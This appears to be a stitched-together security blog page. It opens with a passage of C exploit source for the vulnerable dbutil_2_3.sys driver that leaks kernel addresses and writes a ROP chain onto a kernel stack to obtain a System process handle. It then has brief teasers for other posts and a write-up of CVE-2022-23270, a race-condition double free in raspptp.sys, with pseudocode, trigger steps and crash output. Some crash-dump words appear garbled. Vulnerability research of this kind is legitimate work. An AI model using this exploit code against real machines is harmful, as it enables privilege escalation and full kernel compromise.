 * This function leverages NtQuerySystemInformation (by
 * calling resolveFunc() to get NtQuerySystemInformation's
 * location in memory) to leak the KTHREAD object associated
 * with our previously created "dummy thread"
 *
 * @param dummythreadHandle - A handle to the "dummy thread"
 * @return A pointer to the KTHREAD object
 */
ULONG64 leakKTHREAD(HANDLE dummythreadHandle)
{
	//
	// Set the NtQuerySystemInformation return value to STATUS_INFO_LENGTH_MISMATCH for call to NtQuerySystemInformation
	//
	NTSTATUS retValue = STATUS_INFO_LENGTH_MISMATCH;

	//
	// Resolve ntdll!NtQuerySystemInformation
	//
	NtQuerySystemInformation_t NtQuerySystemInformation = resolveFunc();

	//
	// Error handling
	//
	if (NtQuerySystemInformation == (NtQuerySystemInformation_t)1)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to resolve ntdll!NtQuerySystemInformation. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Set size to 1 and loop the call until we reach the needed size
	//
	int size = 1;

	//
	// Output size
	//
	int outSize = 0;

	//
	// Output buffer
	//
	PSYSTEM_HANDLE_INFORMATION out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

	//
	// Error handling
	//
	if (out == NULL)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// do/while to allocate enough memory necessary for NtQuerySystemInformation
	//
	do
	{
		//
		// Free the previous memory
		//
		free(out);

		//
		// Increment the size
		//
		size = size * 2;

		//
		// Allocate more memory with the updated size
		//
		out = (PSYSTEM_HANDLE_INFORMATION)malloc(size);

		//
		// Error handling
		//
		if (out == NULL)
		{
			//
			// Bail out
			//
			goto exit;
		}

		//
		// Invoke NtQuerySystemInformation
		//
		retValue = NtQuerySystemInformation(
			SystemHandleInformation,
			out,
			(ULONG)size,
			&outSize
		);
	} while (retValue == STATUS_INFO_LENGTH_MISMATCH);

	//
	// Verify the NTSTATUS code which broke the loop is STATUS_SUCCESS
	//
	if (retValue != STATUS_SUCCESS)
	{
		//
		// Is out == NULL? If so, malloc failed and we can't free this memory
		// If it is NOT NULL, we can assume this memory is allocated. Free
		// it accordingly
		//
		if (out != NULL)
		{
			//
			// Free the memory
			//
			free(out);

			//
			// Bail out
			//
			goto exit;
		}

		//
		// Bail out
		//
		goto exit;
	}
	else
	{
		//
		// NtQuerySystemInformation should have succeeded
		// Parse all of the handles, find the current thread handle, and leak the corresponding object
		//
		for (ULONG i = 0; i < out->NumberOfHandles; i++)
		{
			//
			// Store the current object's type number
			// Thread object = 0x8
			//
			DWORD objectType = out->Handles[i].ObjectTypeNumber;

			//
			// Are we dealing with a handle from the current process?
			//
			if (out->Handles[i].ProcessId == GetCurrentProcessId())
			{
				//
				// Is the handle the handle of the "dummy" thread we created?
				//
				if (dummythreadHandle == (HANDLE)out->Handles[i].Handle)
				{
					//
					// Grab the actual KTHREAD object corresponding to the current thread
					//
					ULONG64 kthreadObject = (ULONG64)out->Handles[i].Object;

					//
					// Free the memory
					//
					free(out);

					//
					// Return the KTHREAD object
					//
					return kthreadObject;
				}
			}
		}
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Close the handle to the "dummy thread"
	//
	CloseHandle(
		dummythreadHandle
	);

	//
	// Return the NTSTATUS error
	//
	return (ULONG64)retValue;
}

/**
 * @brief Function used resolve the base address of ntoskrnl.exe.
 * @param Void.
 * @return ntoskrnl.exe base
 */
ULONG64 resolventBase(void)
{
	//
	// Array to receive kernel-mode addresses
	//
	LPVOID* lpImageBase = NULL;

	//
	// Size of the input array
	//
	DWORD cb = 0;

	//
	// Size of the array output (all load addresses).
	//
	DWORD lpcbNeeded = 0;

	//
	// Invoke EnumDeviceDrivers (and have it fail)
	// to receive the needed size of lpImageBase
	//
	EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// lpcbNeeded should contain needed size
	//
	lpImageBase = (LPVOID*)malloc(lpcbNeeded);

	//
	// Error handling
	//
	if (lpImageBase == NULL)
	{
		//
		// Bail out
		// 
		goto exit;
	}

	//
	// Assign lpcbNeeded to cb (cb needs to be size of the lpImageBase
	// array).
	//
	cb = lpcbNeeded;

	//
	// Invoke EnumDeviceDrivers properly.
	//
	BOOL getAddrs = EnumDeviceDrivers(
		lpImageBase,
		cb,
		&lpcbNeeded
	);

	//
	// Error handling
	//
	if (!getAddrs)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// The first element of the array is ntoskrnl.exe.
	//
	return (ULONG64)lpImageBase[0];

//
// Execution reaches here if an error occurs
//
exit:

	//
	// Return an error.
	//
	return (ULONG64)1;
}

/**
 * @brief Function used write a ROP chain to the kernel-mode stack
 *
 * This function takes the previously-leaked KTHREAD object of
 * our "dummy thread", extracts the StackBase member of the object
 * and writes the ROP chain to the kernel-mode stack leveraging the
 * write64() function.
 *
 * @param inHandle - A valid handle to the dbutil_2_3.sys.
 * @param dummyThread - A valid handle to our "dummy thread" in order to resume it.
 * @param KTHREAD - The KTHREAD object associated with the "dummy" thread.
 * @param ntBase - The base address of ntoskrnl.exe.
 * @return Result of the operation in the form of a boolean.
 */
BOOL constructROPChain(HANDLE inHandle, HANDLE dummyThread, ULONG64 KTHREAD, ULONG64 ntBase)
{
	//
	// KTHREAD.StackBase = KTHREAD + 0x38
	//
	ULONG64 kthreadstackBase = KTHREAD + 0x38;

	//
	// Dereference KTHREAD.StackBase to leak the stack
	//
	ULONG64 stackBase = read64(inHandle, kthreadstackBase);

	//
	// Error handling
	//
	if (stackBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Leaked kernel-mode stack: 0x%llx\n", stackBase);

	//
	// Variable to store our target return address for nt!KiApcInterrupt
	//
	ULONG64 retAddr = 0;

	//
	// Leverage the arbitrary write primitive to read the entire contents of the stack (seven pages = 0x7000)
	// 0x7000 isn't actually commited, so we start with 0x7000-0x8, since the stack grows towards the lower
	// addresses.
	//
	for (int i = 0x8; i < 0x7000 - 0x8; i += 0x8)
	{
		//
		// Invoke read64() to dereference the stack
		//
		ULONG64 value = read64(inHandle, stackBase - i);

		//
		// Kernel-mode address?
		//
		if ((value & 0xfffff00000000000) == 0xfffff00000000000)
		{
			//
			// nt!KiApcInterrupt+0x328?
			//
			if (value == ntBase + 0x41b718)
			{
				//
				// Print update
				//
				printf("[+] Leaked target return address of nt!KiApcInterrupt!\n");

				//
				// Store the current value of stackBase - i, which is nt!KiApcInterrupt+0x328
				//
				retAddr = stackBase - i;

				//
				// Break the loop if we find our address
				//
				break;
			}
		}

		//
		// Reset the value
		//
		value = 0;
	}

	//
	// Print update
	//
	printf("[+] Stack address: 0x%llx contains nt!KiApcInterrupt+0x328!\n", retAddr);

	//
	// Handle to the System process
	//
	HANDLE systemprocHandle = NULL;

	//
	// CLIENT_ID
	//
	CLIENT_ID clientId = { 0 };
	clientId.UniqueProcess = ULongToHandle(4);
	clientId.UniqueThread = NULL;

	//
	// Declare OBJECT_ATTRIBUTES
	//
	OBJECT_ATTRIBUTES objAttrs = { 0 };

	//
	// memset the buffer to 0
	//
	memset(&objAttrs, 0, sizeof(objAttrs));

	//
	// Set members
	//
	objAttrs.ObjectName = NULL;
	objAttrs.Length = sizeof(objAttrs);
	
	//
	// Begin ROP chain
	//
	write64(inHandle, retAddr, ntBase + 0xa50296);				// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x8, &systemprocHandle);		// HANDLE (to receive System process handle)
	write64(inHandle, retAddr + 0x10, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x18, PROCESS_ALL_ACCESS);		// PROCESS_ALL_ACCESS
	write64(inHandle, retAddr + 0x20, ntBase + 0x2e8281);		// 0x1402e8281: pop r8 ; ret ; \x41\x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x28, &objAttrs);				// OBJECT_ATTRIBUTES
	write64(inHandle, retAddr + 0x30, ntBase + 0x42a123);		// 0x14042a123: pop r9 ; ret ; \x41\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x38, &clientId);				// CLIENT_ID
	write64(inHandle, retAddr + 0x40, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x48, ntBase + 0x413210);		// nt!ZwOpenProcess
	write64(inHandle, retAddr + 0x50, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	write64(inHandle, retAddr + 0x58, ntBase + 0xa50296);		// 0x140a50296: pop rcx ; ret ; \x40\x59\xc3 (1 found)
	write64(inHandle, retAddr + 0x60, (ULONG64)dummyThread);	// HANDLE to the dummy thread
	write64(inHandle, retAddr + 0x68, ntBase + 0x99493a);		// 0x14099493a: pop rdx ; ret ; \x5a\x46\xc3 (1 found)
	write64(inHandle, retAddr + 0x70, 0x0000000000000000);		// Set exit code to STATUS_SUCCESS
	write64(inHandle, retAddr + 0x78, ntBase + 0x6360a6);		// 0x1406360a6: pop rax ; ret ; \x58\xc3 (1 found)
	write64(inHandle, retAddr + 0x80, ntBase + 0x4137b0);		// nt!ZwTerminateThread
	write64(inHandle, retAddr + 0x88, ntBase + 0xab533e);		// 0x140ab533e: jmp rax; \x48\xff\xe0 (1 found)
	
	//
	// Resume the thread to kick off execution
	//
	ResumeThread(dummyThread);

	//
	// Sleep Project2.ee for 1 second to allow the print update
	// to accurately display the System process handle
	//
	Sleep(1000);

	//
	// Print update
	//
	printf("[+] System process HANDLE: 0x%p\n", systemprocHandle);

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return the NTSTATUS error
	//
	return (ULONG64)1;
}

/**
 * @brief Exploit entry point.
 * @param Void.
 * @return Success (0) or failure (1).
 */
int main(void)
{
	//
	// Invoke getHandle() to get a handle to dbutil_2_3.sys
	//
	HANDLE driverHandle = getHandle();

	//
	// Error handling
	//
	if (driverHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't get a handle to dbutil_2_3.sys. Error: 0x%lx", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Obtained a handle to dbutil_2_3.sys! HANDLE value: %p\n", driverHandle);

	//
	// Invoke getthreadHandle() to create our "dummy thread"
	//
	HANDLE getthreadHandle = createdummyThread();

	//
	// Error handling
	//
	if (getthreadHandle == (HANDLE)-1)
	{
		//
		// Print update
		//
		printf("[-] Error! Couldn't create the \"dummy thread\". Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] Created the \"dummy thread\"!\n");

	//
	// Invoke leakStack()
	//
	ULONG64 kthread = leakKTHREAD(getthreadHandle);

	//
	// Error handling (Negative value? NtQuerySystemInformation returns a negative NTSTATUS if it fails)
	//
	if ((!kthread & 0x80000000) == 0x80000000)
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Error handling (kthread isn't negative - but is it a kernel-mode address?)
	//
	else if ((!kthread & 0xffff00000000000) == 0xffff00000000000 || ((!kthread & 0xfffff00000000000) == 0xfffff00000000000))
	{
		//
		// Print update
		// kthread is an NTSTATUS code if execution reaches here
		//
		printf("[-] Error! Unable to leak the KTHREAD object of the \"dummy thread\". Error: 0x%llx\n", kthread);

		//
		// Bail out
		//
		goto exit;
	}

	//
	// Print update
	//
	printf("[+] \"Dummy thread\" KTHREAD object: 0x%llx\n", kthread);

	//
	// Invoke resolventBase() to retrieve the load address of ntoskrnl.exe
	//
	ULONG64 ntBase = resolventBase();

	//
	// Error handling
	//
	if (ntBase == (ULONG64)1)
	{
		//
		// Bail out
		//
		goto exit;
	}

	//
	// Invoke constructROPChain() to build our ROP chain and kick off execution
	//
	BOOL createROP = constructROPChain(driverHandle, getthreadHandle, kthread, ntBase);

	//
	// Error handling
	//
	if (!createROP)
	{
		//
		// Print update
		//
		printf("[-] Error! Unable to construct the ROP chain. Error: 0x%lx\n", GetLastError());

		//
		// Bail out
		//
		goto exit;
	}

//
// Execution comes here if an error is encountered
//
exit:

	//
	// Return an error
	//
	return 1;
}

Peace, love, and positivity :-).

g_CiOptions in a Virtualized World

With the leaking of code signing certificates and exploits for vulnerable drivers becoming common occurrences, adversaries are adopting the kernel as their new playground. And with Microsoft making technologies like Virtualization Based Security (VBS) and Hypervisor Code Integrity (HVCI) available, I wanted to take some time to understand just how vulnerable endpoints are when faced with an attacker set on escaping to Ring-0.

HackSys Extreme Vulnerable Driver 3 - Stack Overflow + SMEP Bypass

This post is a writeup of a simple Stack Buffer Overflow in HackSys Extreme Vulnerable Driver - we assume that you already have an environment setup to follow along. However, if you don’t have an environment setup in this post we use: Windows 10 Pro x64 RS1 HEVD 3.00 If you are not sure how to setup a kernel debugging environment you can find plenty of posts of the process online, we will not cover the process in this post.

CVE-2022-23270 – Windows Server VPN Remote Kernel Use After Free Vulnerability (Part 2)

Following yesterday’s Microsoft VPN vulnerability, today we’re presenting CVE-2022-23270, which is another windows VPN Use after Free (UaF) vulnerability that was discovered through reverse engineering and fuzzing the raspptp.sys kernel driver. This presents attackers with another chance to perform denial of service and potentially even achieve remote code execution against a target server.

Affected Versions

The vulnerability affects most versions of Windows Server and Windows Desktop since Windows Server 2008 and Windows 7 Respectively. To see a full list of affected Windows versions check the official disclosure post on MSRC:

The vulnerability affects both server and client use cases of the raspptp.sys driver and can potentially be triggered in both cases. This blog post will focus on triggering the vulnerability against a server target.

Introduction

CVE-2022-23270 is heavily dependent on the implementation of the winsock Kernel (WSK) layer in raspptp.sys, to be successfully triggered. If you want to learn more about the internals of raspptp.sys and how it interacts with WSK, we suggest you read our write up for CVE-2022-21972 before continuing:

CVE-2022-23270 is a Use after Free (UaF) resulting in Double Free that occurs as the result of a race condition. It resides in the implementation of PPTP Calls in the raspptp.sys driver.

PPTP implements two sockets; a TCP control connection and a GRE data connection. Calls are setup and managed by the control connection and are used to identify individual data streams handled by the GRE connection. The Call functionality makes it easy for PPTP to multiplex multiple different streams of VPN data over one connection.

Now we know in simple terms what PPTP calls are, lets see how they can be broken!

The Vulnerability

This section explores the underlying vulnerability.  We will then move on to triggering the vulnerable code on the target.

PPTP Call Context Objects

PPTP calls can be created through an IncomingCallRequest or an OutgoingCallRequest control message. The raspptp.sys driver creates a call context structure when either of these call requests are initiated by a connected PPTP client. The call context structures are designed to be used for tracking information and buffering GRE data for a call connection. For this vulnerability construction of the objects by raspptp.sys is unimportant we instead care about how they are accessed.

Accessing the Call Context

There are two ways in which handling a PPTP control message can retrieve a call context structure. Both methods require the client to know the associated call ID for the call context structure. This ID is randomly generated by the server sent to the client within the reply to the Incoming or Outgoing call request. The client then uses that ID in all subsequent control messages sent to the server that relate to that specific call. See the PPTP RFC (https://datatracker.ietf.org/doc/html/rfc2637) for more information on how this is handled.

raspptp.sys uses two methods to access the call context structures when parsing control messages:

  • Globally accessible Call ID indexed array.
  • PPTP control connection context stored link list.

The difference between these two access methods is scope. The global array can retrieve any call allocated by any control connection, but the linked list only contains calls relating to the control connection containing it.

Let’s go a bit deeper into these access methods and see if they play nicely together…

Linked List Access

The linked list access method is performed through two functions within raspptp.sys. EnumListEntry which is used to iterate through each member of the control connection call linked list and EnumComplete which is used to end the current loop and reset state.

while ( 1 )
{
    EnumRecord = EnumListEntry(
    &lpPptpCtlCx->CtlCallDoubleLinkedList,
    (LIST_ENTRY *)&ListIterator,
    &lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);
    if ( !EnumRecord )
        break;
    EnumCallCtx = (CtlCall *)(EnumRecord - 2);
    if ( EnumRecord != (PVOID *)16 && EnumCallCtx->CallAllocTag == 'CPTP' )
        CallEventOutboundTunnelEstablished(EnumCallCtx);
}
Itreator = (LIST_ENTRY *)&ListIterator;
EnumComplete(Itreator, (KSPIN_LOCK)&lpPptpCtlCx->pPptpAdapterCtx->PptpAdapterSpinLock);

The ListIterator variable is used to store the current linked list entry that has been reached in the list so that the loop can continue from this point on the next call to EnumListEntry. EnumComplete simply resets the ListIterator variable once it’s done with. The way in which this code appears in the raspptp.sys driver can change around slightly but the overall method is the same. Call EnumListEntry repeatedly until it returns null and then call EnumComplete to tidy up the iterator.

Global Call Array

The global array access method is handled through a function called CallGetCall:

CtlCall *__fastcall CallGetCall(PptpAdapterContext *AdapterCtx, unsigned __int64 CallId)
{
    PptpAdapterContext *lpAdapterCtx;
    unsigned __int64 lpCallId;
    CtlCall *CallEntry;
    KIRQL curAdaperIRQL;
    unsigned __int64 BaseCallID;
    unsigned __int64 CallIdMaskApplied;

    lpAdapterCtx = AdapterCtx;
    lpCallId = CallId;
    CallEntry = 0i64;
    curAdaperIRQL = KeAcquireSpinLockRaiseToDpc(&AdapterCtx->PptpAdapterSpinLock);
    BaseCallID = (unsigned int)PptpBaseCallId;
    lpAdapterCtx->HandlerIRQL = curAdaperIRQL;
    if ( lpCallId >= BaseCallID && lpCallId < (unsigned int)PptpMaxCallId )
    {
        if ( PptpCallIdMaskSet )
        {
            CallIdMaskApplied = (unsigned int)lpCallId & PptpCallIdMask;
            if ( CallIdMaskApplied < (unsigned int)PptpWanEndpoints )
            {
                CallEntry = lpAdapterCtx->PptpWanEndpointsArray + CallIdMaskApplied;
                if ( CallEntry )
                    {
                        if ( CallEntry->PptpWanEndpointFullCallId != lpCallId )
                            CallEntry = 0i64;
                    }
            }
        }
        else
        {
            CallEntry = lpAdapterCtx->PptpWanEndpointsArray + lpCallId - BaseCallID;
        }
    }
KeReleaseSpinLock(&lpAdapterCtx->PptpAdapterSpinLock, curAdaperIRQL);
return CallEntry;
}

This function effectively just retrieves the array slot that the call context structure should be stored in based on the provided call ID. It then returns the structure at that entry provided that it matches the specified ID and is in fact a valid entry.

So, what’s the issue? Both of these access methods look pretty harmless, right? There is one subtle and simple issue in the way these access methods are used. Locking!

Cross Thread Access?

CallGetCall is intended to be able to retrieve any call allocated by any currently connected control connection. Since a control connection doesn’t care about other control connection owned calls the control connection state machine should have no use for CallGetCall or at least, according to the PPTP RFC, it shouldn’t. However, this isn’t the case there are several control connection methods in raspptp.sys that use CallGetCall instead of referencing the internal control connection linked list!

If CallGetCall lets us access other control connection call context structures and certain parts of the PPTP handling can occur concurrently, then we can theoretically access the same call context structure in two different threads at the same time! This is starting to sound like a recipe for some racy memory corruption conditions.

Lock and Roll

Both the linked list access method and the CallGetCall function reference a PptpAdapterSpinLock variable on a global context structure. This is a globally accessible kernel spin lock that is to be used to prevent concurrent access to things which can be accessed globally. Using this should make any concurrent use of either call context list access method safe, right?

This isn’t the case at all. Looking at the above pseudo code the lock in CallGetCall is only actually held when we are searching through the list, which is great for the lookup but it’s not held once the call structure is returned. Unless the caller re locks the global lock before using the context structure (spoiler alert, it does not) then we have a potential window for unsafe concurrent access.

Concurrent access doesn’t necessarily mean we have a vulnerability. To prove that we have a vulnerability, we need two code locations that could cause a further issue when running with access to the object at the same time. For example, any form of free operation performed on the structure in this scenario could be a good source of an exploitable issue.

Getting Memory Corruption

Within the raspptp.sys driver there are many places where the kind of access we’re looking for can occur and cause different kinds of issues. Going over all of them is probably an entire series worth of blog posts that we can’t imagine anyone really wants. The one we ended up using for the Proof of Concept (PoC) involves the following two operations:

  • Closing A Control Connection
    • When a control connection is closed the control connections call linked list is walked and each call context structure is appropriately de-initialised and freed. This operation is performed by a familiar function, CtlpCleanup.
  • Sending an OutgoingCallReply control message with an error code set
    • If an OutgoingCallReply message is sent with an error set the call structure that it relates to is freed. The CallGetCall function is used for looking up the call context structure in this control message handling, which means we can use it to perform the free while the control connection close routine is running in a separate thread.

These two conditions create a scenario where if both were to happen consecutively, a call context structure is freed twice, causing a Use after Free/Double Free issue!

Race Against the Machine!

To trigger the race we need to take the following high level steps:

  • Create two control connections and initialise them so we can create calls.
  • On the first connection, we create the maximum allowed number of calls the server will allow us to.
  • We then consecutively close the first connection and start sending OutGoingCallReply messages for the allocated call IDs.
    • This realistically needs to be done in separate threads bound to separate CPU cores to guarantee true concurrency.
  • Then we sit back and wait for the race to be won?

In practice, reliably implementing these steps is a lot more difficult than it would initially seem. The window for reliably triggering the race condition and the amount of time we have to do something useful once the initial free occurs is incredibly small, even in the best case scenario.

However, this does not mean that it cannot be achieved. With a significant amount of effort it is possible to greatly increase the reliability of triggering the vulnerability. There are many different factors that can be played with to build a path towards successful exploitation.

One Lock, Two Lock, Three Lock, Four!

Let’s take a look at the two bits of code we’re hoping to get perfectly aligned and see just how tricky this race condition is actually going to be.

The CtlpCleanup Linked List Iteration

for ( ListIterator = (LIST_ENTRY *)EnumListEntry(
    &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
    &iteratorState,
    &gAdapter->PptpAdapterSpinLock);
    ListIterator;
    ListIterator = (LIST_ENTRY *)EnumListEntry(
    &lpCtlCtxToCleanup->CtlCallDoubleLinkedList,
    &iteratorState,
    &lpCtlCtxToCleanup->pPptpAdapterCtx->PptpAdapterSpinLock) )
    {
        lpCallCtx = (CtlCall *)&ListIterator[-1];
        if ( ListIterator != (LIST_ENTRY *)16 && lpCallCtx->CallAllocTag == 'CPTP' )
        {
            ...
        CallCleanup(lpCallCtx); // this will eventually free the call strructure
    }
}

We can see here that the loop is fairly small. The main part that we are interested in is the call to CallCleanup that is performed on each Call structure in the control context linked list. Now unfortunately this function is not as simple as we would like. The function contains a large number of different paths to execute and could potentially have a variety of ways that make our race condition harder or easier to exploit. The section that is most interesting for us in our PoC is the following pseudo code snippet.

lpIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
lpCallToClean->NdisVcHandle = 0i64;
lpCallToClean->CurIRQL = lpIRQL;
CallDetachFromAdapter(lpCallToClean);
KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
if...
    CtlDisconnectCall(lpCallToClean);
    CallpCancelCallTimers(lpCallToClean);
    DereferenceRefCount(lpCallToClean); // Decrement from Ctl loop
    lpCallToClean->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallToClean->CtlCallSpinLock_A);
}
}

KeReleaseSpinLock(&lpCallToClean->CtlCallSpinLock_A, lpCallToClean->CurIRQL);
return DereferenceRefCount(lpCallToClean); // Freeing decrement

Here, a set of detach operations are performed to remove the call structure from the lists its stored in and appropriately decrease its internal reference count. A side effect of this detach phase is that the call context structure is removed from both the linked list and global array. This means that if one thread gets to far through processing a call context structure free before the other one retrieves it from the respective list, the race will already be lost. This further adds to the difficulty in getting these two sections of code lined up.

Ultimately the final call to DereferenceRefCount causes the release of the underlying memory which in our scenario it does by calling the call context structures internal free function pointer to the CallFree function. Before we go over what CallFree does, lets look at the other half of the race condition.

OutgoingCallReply Handling

lpCallOutgoingCallCtx = CallGetCall(lpPptpCtlCx->pPptpAdapterCtx, ReasonCallIdMasked);
if ( lpCallOutgoingCallCtx )
{
    CallEventCallOutReply(lpCallOutgoingCallCtx, lpCtlPayloadBuffer);
}

The preceding excerpt of pseudo code is the bit of the OutgoingCallReply handling that we will be using to access the call context structures from a separate thread. Let’s take a look at the logic in this function which will also free the call context object!

lpCallCtx->CurIRQL = KeAcquireSpinLockRaiseToDpc(&lpCallCtx->CtlCallSpinLock_A); 
... 
KeReleaseSpinLock(&lpCallCtx->CtlCallSpinLock_A, lpCallCtx->CurIRQL); 
if ( OutGoingCallReplyStatusCode ) { 
    CallSetState(lpCallCtx, 0xBu, v8, 0); CallCleanup(lpCallCtx);
}

This small code snippet from CallEventCallOutReply represents the code that is relevant for our PoC. Effectively if the status field of the OutgoingCallReply message is set then a call to CallCleanup happens and again will eventually result in CallFree being hit.

CallFree

The call free function releases resources for multiple sub objects stored in the call context as well as the call context itself:

void __fastcall CallFree(CtlCall *CallToBeFreed)
{
    CtlCall *lpCallToBeFreed;
    _NET_BUFFER_LIST *v2;
    NDIS_HANDLE v3;
    NDIS_HANDLE v4;
    PNDIS_HANDLE v5;
    PNDIS_HANDLE v6;
    PNDIS_HANDLE v7;

    if ( CallToBeFreed )
    {
        lpCallToBeFreed = CallToBeFreed;
         ...
         v2 = lpCallToBeFreed->CtlNetBufferList_A;
    if ( v2 )
         ChunkLChunkength(v2);
         v3 = lpCallToBeFreed->CtlCallWorkItemHandle_A;
    if ( v3 )
         NdisFreeIoWorkItem(v3);
         v4 = lpCallToBeFreed->CtlCallWorkItemHandle_B;
    if ( v4 )
        NdisFreeIoWorkItem(v4);
        v5 = lpCallToBeFreed->hCtlCallCloseTimeoutTimerObject;
    if ( v5 )
        NdisFreeTimerObject(v5);
        v6 = lpCallToBeFreed->hCtlCallAckTimeoutTimerObject;
    if ( v6 )
        NdisFreeTimerObject(v6);
        v7 = lpCallToBeFreed->hCtlDieTimeoutTimerObject;
    if ( v7 )
        NdisFreeTimerObject(v7);
        ExFreePoolWithTag(lpCallToBeFreed, 0);
    }
}

In CallFree, none of the sub-objects have their pointers Nulled out by raspptp.sys. This means that any one of these objects will cause potential double free conditions to occur, giving us a few different locations where we can expect a potential issue to occur when triggering the vulnerability.

Something that you may notice looking at the code snippets for this vulnerability is that there are large portions of overlapping locks. These will in effect cause each thread not to be able to enter certain sections of the cleanup and freeing process at the same time, which makes the race condition harder to predict. However, it does not prevent it from being possible.

We have knowingly not included many of the other hazards and caveats for triggering this vulnerability, as there are just too many different factors to go over, and in actuality a lot of them are self-correcting (luckily for us). The main reason we can ignore a lot of these hazards is that none of them truly stop the two threads from entering the vulnerable condition!

Proof of Concept

We will not yet be publishing our PoC for this vulnerability to allow time for patches to be fully adopted. This unfortunately makes it hard to show the exact process we took to trigger the vulnerability, but we will release the PoC script at a later date! For now here is a little sneak peak at the outputs:

[+] Race Condition Trigger Attempt: 1, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 2, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 3, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 4, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 5, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 6, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 7, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 8, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 9, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 10, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 11, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 12, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 13, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 14, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 15, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 16, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 17, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 18, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 19, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 20, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 21, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 22, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 23, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 24, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 25, With spacing 0 and sled 25
[+] Race Condition Trigger Attempt: 26, With spacing 0 and sled 25
[****] The Server Has Crashed!

A Wild Crash Appeared!

The first step in PoC development is achieving a successful trigger of a vulnerability and usually for kernel vulnerabilities this means causing a crash! Here it is. A successful trigger of our race condition causing the target server to show us the iconic Blue Screen of Death (BSOD):

Now this crash has the following vulnerability check analysis and its pretty conclusive that we’ve caused one of the intended double free scenarios.

*******************************************************************************
* *
* Vulnerabilitycheck Analysis *
* *
*******************************************************************************

KERNEL_SECURITY_CHECK_FAILURE (139)
A kernel component has corrupted a critical data structure. The corruption
could potentially allow a malicious user to gain control of this machine.
Arguments:
Arg1: 0000000000000003, A LIST_ENTRY has been corrupted (i.e. double remove).
Arg2: ffffa8875b31e820, Address of the trap frame for the exception that caused the vulnerabilitycheck
Arg3: ffffa8875b31e778, Address of the exception record for the exception that caused the vulnerabilitycheck
Arg4: 0000000000000000, Reserved

Devulnerabilityging Details:
------------------

KEY_VALUES_STRING: 1

Key : Analysis.CPU.mSec
Value: 5327

Key : Analysis.DevulnerabilityAnalysisManager
Value: Create

Key : Analysis.Elapsed.mSec
Value: 22625

Key : Analysis.Init.CPU.mSec
Value: 46452

Key : Analysis.Init.Elapsed.mSec
Value: 9300845

Key : Analysis.Memory.CommitPeak.Mb
Value: 82

Key : FailFast.Name
Value: CORRUPT_LIST_ENTRY

Key : FailFast.Type
Value: 3

Key : WER.OS.Branch
Value: fe_release

Key : WER.OS.Timestamp
Value: 2021-05-07T15:00:00Z

Key : WER.OS.Version
Value: 10.0.20348.1

VULNERABILITYCHECK_CODE: 139

VULNERABILITYCHECK_P1: 3

VULNERABILITYCHECK_P2: ffffa8875b31e820

VULNERABILITYCHECK_P3: ffffa8875b31e778

VULNERABILITYCHECK_P4: 0

TRAP_FRAME: ffffa8875b31e820 -- (.trap 0xffffa8875b31e820)
NOTE: The trap frame does not contain all registers.
Some register values may be zeroed or incorrect.
rax=0000000000000000 rbx=0000000000000000 rcx=0000000000000003
rdx=ffffcf88f1a78338 rsi=0000000000000000 rdi=0000000000000000
rip=fffff8025f8d8ae1 rsp=ffffa8875b31e9b0 rbp=ffffcf88f1ae0602
r8=0000000000000010 r9=000000000000000b r10=fffff8025b0ddcb0
